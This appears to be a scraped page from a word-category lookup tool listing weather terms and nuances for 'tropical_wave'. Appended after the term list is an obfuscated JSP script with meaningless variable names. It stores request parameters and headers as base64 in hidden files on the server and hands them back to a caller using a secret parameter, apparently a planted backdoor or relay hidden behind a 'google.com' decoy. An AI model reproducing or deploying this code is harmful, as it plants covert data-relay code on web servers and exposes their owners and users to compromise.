Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
tropical_wave
with head word
weather
:
severe:weather,
tropical:weather,
Category Nuances matching
weather
:
up,
deadly,
unstable,
severe,
inclement,
local,
transient,
unusual,
extreme,
violent,
incoming,
unbearable,
dangerous,
destructive,
interesting,
devastating,
environmental,
damaging,
wild,
adverse,
world,
abnormal,
harsh,
harmful,
sudden,
bad,
poor,
disruptive,
hazardous,
unexpected,
realistic,
significant,
dynamic,
powerful,
disastrous,
intense,
terrible,
real,
wet,
changing,
direct,
tropical,
nasty,
difficult,
atmospheric,
variable,
chaotic,
unpredictable,
seasonal,
moist,
marine,
weather,
unforeseen,
excessive,
warm,
flying,
under,
unpleasant,
catastrophic,
minor,
rough,
undesirable,
strong,
climatic,
particulate,
Members for simple category
weather
:
tornado,
gale,
hurricane,
frost_pocket,
turbulent_storm,
excess_precipitation,
severe_snowstorm,
rain,
heavy_snowfall,
snowfall,
strong_rain,
freezing_drizzle,
thunderstorm,
persistent_frost,
snow,
cyclone,
thunder_storm,
severe_lightning,
drying_wind,
heavy_rainfall,
tropical_cyclone,
heavy_dew,
monsoon_rain,
tropical_depression,
tropical_rainfall,
mistral,
blizzard,
heavy_rain,
freezing_snow,
untimely_frost,
storm,
hail,
noreaster,
damaging_tornado,
lightning,
dangerous_lightning,
ferocious_hailstorm,
impending_hurricane,
yesterday_tornado,
updraft,
severe_rain,
lenticular_cloud,
lighting_storm,
typhoon,
large_hail,
strong_wind,
strong_thunderstorm,
snowstorm,
recent_blizzard,
cumulative_snowfall,
downdraft,
severe_wind,
high_snowfall,
unfavorable_wind,
tempest,
rough_wave,
unexpected_typhoon,
high_wind,
depression,
dangerous_wind,
torrential_rainfall,
individual_thunderstorm,
excessive_rainfall,
tropical_storm,
land_gale,
destructive_wind,
heavy_precipitation,
torrential_rain,
larger_wave,
blowing_snow,
rainfall,
winter_blizzard,
blue_norther,
down_wind,
major_snowstorm,
deadly_lightning,
good_snowstorm,
northerly_wind,
high_rainfall,
turbulence,
heavy_wind,
frigid_weather,
much_rain,
shelf_cloud,
stronger_wind,
recent_tornado,
intense_cyclone,
major_storm,
intense_rainfall,
sandstorm,
hail_storm,
driving_rain,
front,
developing_thunderstorm,
winter_storm,
flash_storm,
damaging_hail,
thick_cloud,
gusty_wind,
mystery_wave,
early_frost,
strong_gale,
spring_frost,
torrential_downpour,
strong_gust,
wind_storm,
frost,
occasional_blizzard,
deep_snow,
lightning_storm,
heavy_thunderstorm,
heavy_lightning,
flood_tornado,
nighttime_fog,
precipitation,
extreme_snow,
rain_storm,
excessive_precipitation,
sudden_thunderstorm,
severe_frost,
downpour,
hailstorm,
tropical_wave,
heavy_cloud,
severe_storm,
sleet,
big_snow,
hurricane_tornado,
northerly,
sand_storm,
electrical_storm,
light_rain,
hot_weather,
strong_crosswind,
shear_wind,
intense_rain,
heavy_snowstorm,
northeaster,
multiple_rain,
falling_snow,
blowing_rain,
dense_fog,
ice_storm,
precipitation_storm,
cloudiness,
heavy_fog,
whiteout,
thick_fog,
windiness,
cold_rain,
heavy_storm,
big_rain,
extreme_rainfall,
local_precipitation,
pelting_rain,
storm_wind,
damaging_wind,
windstorm,
wave,
heavy_snow,
snow_storm,
monsoon,
freezing_precipitation,
heavy_rainstorm,
fog,
light_snow,
freezing_rain,
afternoon_thunderstorm,
wind,
extreme_windstorm,
sea_storm,
developing_snowstorm,
hard_frost,
rainstorm,
heavy_downpour,
cold_wind,
crosswind,
violent_tornado,
severe_thunderstorm,
desert_wind,
cloud,
low_cloud,
snow_shower,
unusual_rainfall,
little_rain,
abundant_rainfall,
easterly_wave,
thermal,
violent_thunderstorm,
gust,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>